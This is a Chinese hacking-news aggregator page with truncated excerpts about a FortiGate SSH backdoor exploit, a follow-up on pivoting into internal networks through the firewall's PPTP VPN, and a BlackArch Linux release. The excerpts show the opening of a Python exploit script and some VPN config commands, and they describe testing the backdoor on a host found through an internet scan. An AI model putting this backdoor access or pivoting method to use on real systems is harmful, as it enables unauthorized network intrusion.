记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7

from:tools.pwn.ren 今天 twitter 4 点钟的时候 有老外放出一个飞塔 os 的 exp ,说 4.0 – 5.0.7 !存在一个 ssh 的后门 进行了简单的测试,影响确实重大! 通过过Zoomeye搜索发现存在 64567台主机, 挑选一台进行测试 利用脚本 #!/usr/bin/env python # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 # Usage: ./fgt_ssh_backdoor.py <target-ip> import socket import select import sys import paramiko from paramiko.py3
发布时间:2016-01-14 02:10 | 阅读:114196 | 评论:0 | 标签:Linux/Unix exp OS ssh 后门 飞塔 飞塔系统

飞塔SSH后门 进一步利用方法

from:tools.pwn.ren 昨天FortiGate爆了一个SSH Backdoor ,具体内容可以看这(http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html) 那我们如何利用了?如何利用这个SSH 后门进入到内网了?好了这就是这篇文章要讲的东西。 这个后门获取到的是防火墙的root权限,就是所有防火墙的操作我们都可以做,这里我们利用防火墙的 vpn服务来进入到内网中 ,从而进行进一步渗透。 0X00 先看下用户组 show user group 0x01开启vpn config vpn pptp set status enable set eip 192
发布时间:2016-01-14 02:10 | 阅读:107800 | 评论:0 | 标签:Linux/Unix Backdoor fortigate OS ssh 后门 飞塔

新增30多种工具:BlackArch Linux新版发布

BlackArch Linux是一个轻量的、灵活的、基于 Arch linux 的渗透测试发行版,遵循 K.I.S.S 原则,主要面向测试人员与安全研究者群体。目前平台集成的工具已经超过1337款,大家可以对其进行独立安装或者以分组形式批量安装。同时BlackArch Linux与现有Arch安装版本全面兼容。主要更新内容增添了30多种新工具更新了系统软件安装包以及系统用户文件(etc/)Linux系统内核更新至 4.3.3版本蓝牙软件包更新内容:bluez、 bluez-firmware、 bluez-hid2hci、 bluez-utils采用了新的浏览器midori采用了新的播放器mpvbeef版本更新补充一些原来缺少的安全检测工具增加新版本交
发布时间:2016-01-12 17:55 | 阅读:78755 | 评论:0 | 标签:工具 BlackArch OS 渗透测试

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词